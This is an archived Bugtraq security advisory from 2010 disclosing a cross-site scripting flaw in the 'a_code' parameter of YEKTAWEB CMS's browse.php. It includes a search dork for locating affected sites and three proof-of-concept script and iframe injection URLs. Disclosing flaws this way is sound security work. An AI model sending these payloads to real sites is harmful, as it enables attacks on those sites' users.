[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

YEKTAWEB CMS XSS Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: YEKTAWEB CMS XSS Vulnerability
From: faghani@xxxxxxx
Date: 28 Dec 2010 05:38:19 -0000

================= IUT-CERT =================

Title: YEKTAWEB CMS XSS Vulnerability

Vendor: www.yektaweb.com

Dork: Powered by Academic Web Tools ( AWT ) - Yektaweb Collection
Type: Input.Validation.Vulnerability (cross-Site scripting)

Fix: N/A

================== nsec.ir =================


Description:
--------------------------------------------

YEKTAWEB is an Academic web tool. "browse.php" pages in this CMS is vulnerable 
to xss and link injection.


Vulnerability Variant:
---------------------------------------------
XSS: "browse.php" in "a_code" parameter. 

http://www.example.com/browse.php?a_code=";></IFRAME><script>alert(12345)</script>&sid=1&slc_lang=fa
http://www.example.com/browse.php?a_code=1<iframe/+/onload=alert(12345)></iframe>.
http://www.example.com/browse.php?a_code=1>"><ScRiPt 
%0A%0D>alert(12345)%3B</ScRiPt>.

Solution:
---------------------------------------------

Input validation of Parameter "a_code" should be corrected.


Credit:
---------------------------------------------

Isfahan University of Technology - Computer Emergency Response Team

Thanks to :  N. Fathi, M. R. Faghani

Prev by Date: HotWeb Rentals "PageId" SQL Injection Vulnerability
Next by Date: [waraxe-2010-SA#079] - Reflected XSS in Coppermine 1.5.10
Previous by thread: HotWeb Rentals "PageId" SQL Injection Vulnerability
Next by thread: [waraxe-2010-SA#079] - Reflected XSS in Coppermine 1.5.10
Index(es):
- Date
- Thread